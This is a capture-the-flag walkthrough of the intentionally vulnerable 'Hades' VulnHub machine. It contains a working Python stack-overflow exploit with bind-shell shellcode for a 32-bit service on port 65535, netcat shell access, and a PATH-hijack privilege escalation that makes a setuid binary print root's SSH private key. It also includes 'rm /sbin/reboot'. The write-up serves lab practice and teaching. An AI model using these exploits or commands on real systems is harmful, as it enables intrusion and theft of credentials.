Hades Writeup

Hello.

What an awesome challenge.

Thanks Lok_Sigma.

I started that a bit late but here i am!

Information Gathering

port_scan

Grabbing banners

telnet 192.168.58.127 22 SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.1

No luck here of course!

SSHing Hades

ssh [email protected]

returned me a welcome banner:

f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAABUDgAAAAAAADQAIAAIACgAHwAcAAYAAAA0AAAANIAECDSABAgAAQAAAAEAAAUAAAAEAAAAAwAAADQBAAA0gQQINIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIxAsAAMQLAAAFAAAAABAAAAEAAADECwAAxJsECMSbBAhQAQAAVAAAAYAAAAAEAAAAgAAANALAADQmwQI0JsECPAAAADwAAAABgAAAAQAAAAEAAAASAEAAEiBBAhIgQQIRAAAAEQAAAAEAAAABAAAAFDldGTUCgAA1IoECNSKBAg0AAAANAAAAAQAAAAEAAAAUeV0ZAAAAAAAAAAAAAAAAAAAAAAAAAAABw ...[content wrapped]

First i thought that i could split the banner someway and that’s an ssh key that i could login.. But ehh.. NO!

Exploiting

Transferring the encoded binary to Kali Linux

scp base [email protected][kaliip]:/root/Desktop/base

Base64 Decode

cat base.enc | base64 -d | tee base.bin

After the decryption i saw an "ELF" string at the start of the file. That means that it's an executable.

[email protected]# file base.bin base.bin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, not stripped

netstat -ntpl netstat

Hmm, port 65535 is opened to my box. That seems to be the executable that is running on the hades box on the same port. So, if i manage to exploit it i could get shell on Hades.

base.bin runtime protections

checksec

Here i see no protections in the executable. BUT, by default in new systems we have ASLR. That means randomization of stack!

[email protected]:/display_root_ssh_key# ruby /usr/share/metasploit-framework/tools/pattern_create.rb 175  
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7A  

Exploit Base

#!/usr/bin/python
import socket  
port = int(raw_input('Enter port:'))  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Abb8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5AdAd7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4A5Af6Af7A")

try:  
     print "\nSending evil h3ck..."
     s.connect(('localhost',port))
     data = s.recv(1024)
     s.send(buffer + '\r\n')
     print "\nDone!."
except:  
     print "Could not connect” 

From the pattern_offset.rb i understood that:

[171 bytes garbage][EIP]

From this part i enabled the ASLR in gdb in order to work with real conditions.

(gdb) set disable-randomization off

We are checking the $esp that we stored our shellcode. Our shellcode starts at 0xbffff3c0. That means that it is 0x1c(28) bytes from the start of $esp.

stack

I should find a gadget that will help me to jump at the start of my shellcode. In other words, i would like to make the start of the stack to be my shellcode.

objdump -d base.bin | grep 0x1c

add_esp

I like that add $0x1c,%esp!

gadget

 8048a32:    83 c4 1c                add    $0x1c,%esp
 8048a35:    5b                      pop    %ebx
 8048a36:    5e                      pop    %esi
 8048a37:    5f                      pop    %edi
 8048a38:    5d                      pop    %ebp
 8048a39:    c3                      ret  

Here we can see that our application is crashing because of the nops instructions. I found useful to put here an jmp $esp address, so when that is executed it will redirect the application to the start of my shellcode.

need_of_jmpesp

Payload

[17* \x90][jmp $esp][shellcode (96 bytes) ][54* \x90][EIP(&Gadget)]

Final exploit

#!/usr/bin/python
import socket

# nasm > jmp esp
# 00000000  FFE4              jmp esp

# gadget 
# 8048a32:    83 c4 1c                add    $0x1c,%esp
# 8048a35:    5b                      pop    %ebx
# 8048a36:    5e                      pop    %esi
# 8048a37:    5f                      pop    %edi
# 8048a38:    5d                      pop    %ebp
# 8048a39:    c3                      ret  

#buffer = "A" *171 + [EIP]

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

#http://shell-storm.org/shellcode/files/shellcode-217.php
shellcode=("\x31\xc0\x31\xdb\xb0\x17\xcd\x80"+  
"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80"+  
"\x89\xc7\x52\x66\x68"+  
"\x7a\x69"+  
"\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80"+  
"\xb0\x66\xb3\x04\xcd\x80"+  
"\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80"+  
"\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80"+  
"\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80")


jmp_esp = "\x97\x86\x04\x08"


buffer = "\x90"*17+ jmp_esp  + shellcode + "\x90"*54+ "\x32\x8a\x04\x08"

try:  
     print "\nSending evil h3ck..."
     s.connect(('192.168.58.128',65535))
     data = s.recv(1024)
     print data
     s.send(buffer)
     print "\nDone!."
except:  
     print "Could not connect" 

Connecting to bind tcp port 31337

The shellcode binds the tcp port 31337 to the hades for us :)

nc 192.168.58.128 31337  

Let's have an interactive shell

python -c 'import pty; pty.spawn("/bin/bash");'

Gather gather gather

[email protected]:/home/loki$ cat notes  
AES 256 CBC  
Good for you and good for me.  
[email protected]:/display_root_ssh_key$ ls -la  
drwxr-xr-x  2 root root   4096 Mar 18 20:31 .  
drwxr-xr-x 23 root root   4096 Mar 19 17:27 ..  
-rw-------  1 root root      1 Mar 19 19:38 counter
-rwsr-sr-x  1 root root 273048 Mar 18 20:31 display_key
ls -la key_file  
-r--------  1 root root  9984 Mar 19 17:27 key_file

I want the id_rsa key :)

First i run strings display_key and i got some cool stuff:
strings

strings1

The display_key didn't run and i created a file "counter" on my test machine. Then, it asked me for a password:

display_key

After 2-3 tries, it reboots the system.

i removed the program that reboots my virtual machine

rm /sbin/reboot  

Be careful i am on a testing machine(live dvd), that's why i removed the file

(other way could be to make the counter file immutable)

not_found

When i saw reboot: not found i would like to try if i can play with environment variables!

export PATH=/home/loki:${PATH}

echo "cat /root/.ssh/id_rsa" > /home/loki/reboot  
chmod +x /home/loki/reboot  

rsa_key

(The counter file must be set to "2" for the exploit to run. This is because the "2" in the counter file triggers the execv("reboot"). )

W00t W00t

I logged in as root in hades with the private rsa ssh key.

ssh -i hades_rsa [email protected][hades_ip]

I created a backup directory with the flag.txt.enc and /key_file just in case.

mkdir /root/backup  
cp /root/flag.txt.enc /root/backup  
cp /key_file /root/backup  
 openssl enc -d -aes-256-cbc -in /root/flag.txt.enc -pass file:/key_file  -out /root/flagg.txt
[email protected]:/# cat /root/flagg.txt  
Congratulations on completing Hades.

Feel free to ping me on #vulnhub and tell me what you thought.

The PGP key below can be used to encrypt solution submissions, and to prove you got through it all.

-Lok_Sigma

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)  
Comment: GPGTools - http://gpgtools.org

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  
=tmFl
-----END PGP PUBLIC KEY BLOCK-----

Bonus information for display_key

Nx Enabled

nx_enabled

cat rsa_key address

cat

EIP owned

[20 bytes garbage][EIP] display_key_eip

S3cr3t !?

There is a string hardcoded in the binary. Nothing much.
s3cr3t


Scripts used:
http://www.trapkit.de/tools/checksec.sh
My attacking machine was Kali Linux 1.0.6 x86
Hades download url: http://vulnhub.com/entry/the-infernal-hades,61/
Please don't hesitate to ask me anything at [email protected]